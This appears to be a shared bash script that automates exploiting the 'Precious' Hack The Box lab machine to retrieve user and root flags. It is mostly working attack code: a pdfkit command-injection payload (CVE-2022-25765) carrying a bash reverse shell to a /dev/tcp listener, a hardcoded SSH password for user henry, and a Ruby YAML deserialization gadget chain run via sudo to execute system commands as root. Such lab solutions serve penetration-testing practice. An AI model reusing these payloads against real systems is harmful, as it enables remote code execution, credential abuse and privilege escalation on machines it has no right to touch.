Ivam3

CCAvsPrecious.sh

Jan 11th, 2023 (edited)
  1. #!/bin/bash
  2. ## THIS SCRIPT RETRIEVES THE USER AND ROOT FLAGS FROM THE PRECIOUS HACK THE BOX MACHINE
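  # Run ctrl_c on SIGINT (signal 2) so an interrupted run still cleans up.
  trap ctrl_c 2

  #######################################
  # Stop the helper HTTP server, delete the staged YAML file, then exit.
  # Installed as the SIGINT handler above.
  # Globals:   TMPDIR (read)
  # Arguments: none
  # Returns:   does not return; exits with the status of the last command run
  #######################################
  ctrl_c() {
    # NOTE(review): killall matches by process name, so this terminates every
    # process named "python" that the caller is allowed to signal, not only
    # the http.server started by this script. Recording that server's PID at
    # launch and killing only it would be narrower.
    killall python 2>/dev/null
    # Quote the path: unquoted, a TMPDIR containing whitespace is split into
    # several arguments and "rm -rf" then recurses into unrelated paths.
    # -f already ignores a missing file, and -r is not needed for a plain file.
    rm -f -- "${TMPDIR}/dependencies.yml"
    exit
  }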
  12.  
  # Install any missing command-line tool through apt before the run starts.
  # Each entry is "<command to probe>:<apt package to install if it is absent>".
  # NOTE(review): "openssb" does not look like a real package name; it is
  # presumably a typo for the OpenSSH package, in which case this step fails
  # whenever ssh is absent. Kept as written; confirm the intended package.
  echo "[*] Installing dependencies ..."
  for dep in ncat:nmap-ncat ssh:openssb sshpass:sshpass wget:wget python:python; do
    if ! command -v "${dep%%:*}" >/dev/null; then
      apt install "${dep#*:}" -y
    fi
  done
  # Run parameters: the pause command executed after each status message,
  # the local listener port, and the address of the lab machine.
  zzz="sleep 0.5"
  lport="4546"
  IPbox="10.10.11.189"

  printf '%s\n' "[*] Getting IP tun0."
  $zzz
  # The pipeline does not select an interface by name. It takes every
  # IPv4-looking token from the ifconfig output, drops the ones containing
  # "255" or "127" anywhere in them, and keeps the first one left. The result
  # is empty when ifconfig is missing or prints nothing (its stderr is hidden).
  tun=$(
    ifconfig 2>/dev/null \
      | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' \
      | grep -v 255 \
      | grep -v 127 \
      | head -n 1
  )
  24.  
  25. echo "[*] Creating payload.";$zzz
  26. payload="http://$tun:8000/?name=#{'%20\`bash -c \"bash -i >& /dev/tcp/$tun/$lport 0>&1\"\`'}"
  27.  
  28. echo "[*] Netcat listening on $tun:$lport";$zzz
  29. #echo "cat ~/.bundle/config"|ncat -nlvp 4546 > ${TMPDIR}/henry.passwd &
  30. echo "[*] Exploting vulnerability CVE-2022-25765 ...";$zzz
  31. #curl http://precious.htb --resolve precious.htb:80:$IPbox --data "url=$payload&submit=Submit" -o precious.pdf
  32. echo "[*] Access gained as user ruby.";$zzz
  33. #henrypwd=$(grep "henry" ${TMPDIR}/henry.passwd|awk -F ":" '{print $NF}'|tr '"' " ")
  34. henrypwd="Q3c1AqGHtoI0aXAYFH"
  35. echo "[*] Escalating privileges to user Henry.";$zzz
  36. echo "[*] Getting user flag";$zzz
  37. Fuser=$(sshpass -p "$henrypwd" ssh henry@$IPbox "cat ~/user.txt")
  38.  
  39. echo "[*] Creating a payload.";$zzz
  40. cat <<- CONF > ${TMPDIR}/dependencies.yml
  41. ---
  42. - !ruby/object:Gem::Installer
  43.     i: x
  44. - !ruby/object:Gem::SpecFetcher
  45.     i: y
  46. - !ruby/object:Gem::Requirement
  47.   requirements:
  48.     !ruby/object:Gem::Package::TarReader
  49.     io: &1 !ruby/object:Net::BufferedIO
  50.       io: &1 !ruby/object:Gem::Package::TarReader::Entry
  51.          read: 0
  52.          header: "abc"
  53.       debug_output: &1 !ruby/object:Net::WriteAdapter
  54.          socket: &1 !ruby/object:Gem::RequestSet
  55.              sets: !ruby/object:Net::WriteAdapter
  56.                  socket: !ruby/module 'Kernel'
  57.                  method_id: :system
  58.              git_set: cat /root/root.txt > /home/henry/root.txt
  59.          method_id: :resolve
  60. CONF
  61.  
  62. echo "[*] Init python server over loopback:8000.";$zzz
  63. cd ${TMPDIR} && python -m http.server 8000 &
  64. echo "[*] Escalating privileges to user Root.";$zzz
  65. sshpass -p "$henrypwd" ssh henry@$IPbox "wget http://$tun:8000/dependencies.yml -O /home/henry/dependencies.yml && sudo /bin/ruby /opt/update_dependencies.rb 2>/dev/null"
  66. echo "[*] Getting root flag.";$zzz
  67. Froot=$(sshpass -p "$henrypwd" ssh henry@$IPbox "cat /home/henry/root.txt")
  68.  
  69. echo -en "\e[31mUSER FLAG =\e[0m $Fuser\n\e[31mROOT FLAG =\e[0m $Froot\n"
  70.  
  71. ctrl_c
  72.  